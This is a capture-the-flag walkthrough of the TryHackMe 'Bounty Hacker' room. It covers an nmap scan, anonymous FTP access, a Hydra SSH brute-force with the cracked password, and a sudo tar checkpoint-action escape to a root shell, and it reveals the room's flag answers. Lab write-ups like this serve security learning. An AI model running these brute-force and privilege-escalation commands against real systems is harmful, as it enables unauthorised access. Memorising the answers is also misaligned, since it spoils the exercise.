Bounty Hacker

THM Bounty Hunter

Task 1 : Deploy the machine

Task 2 : Find open ports on the machine.

Using nmap to scan every port on the server.

# nmap -p- x.x.x.x

Answer 2 : Three open ports found. 21,22,80

Task 3 : Who wrote the task list? 

First stop, trying anonymous login on the FTP. Success!

# ftp 
ftp> open
ftp> ls 
ftp> get locks.txt
ftp> get tasks.txt
anonymous ftp login

After login, found 2 files and downloaded them on my local server.

tasks.txt output

Answer 3 : lin

Task 4 : What service can you bruteforce with the text file found?

locks.txt output

Using Hydra to bruteforce SSH login.

# hydra -l lin -P /root/thm/bountyhunter/locks.txt -t 10 ssh
Hydra SSH

Hydra got a hit, username lin / password RedDr4gonSynd1cat3

Using SSH with the credentials found.

# ssh lin@
SSH login

Answer 4 : SSH

Task 5 : user.txt

After the successful SSH login, list files in the current directory, found the file we are looking for.

user flag

Answer 5 : THM{CR1M3_SyNd1C4T3}

Task 6 : root.txt

Let’s see which commands lin can run.

$ sudo -l
tar binaries

User lin can run tar, so next stop the trusted gtfobins.

$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

And just like that we are root. Let’s find the root.txt

# find / -type f -name root.txt 2>/dev/null | cat root.txt

Answer 6 : THM{80UN7Y_h4cK3r}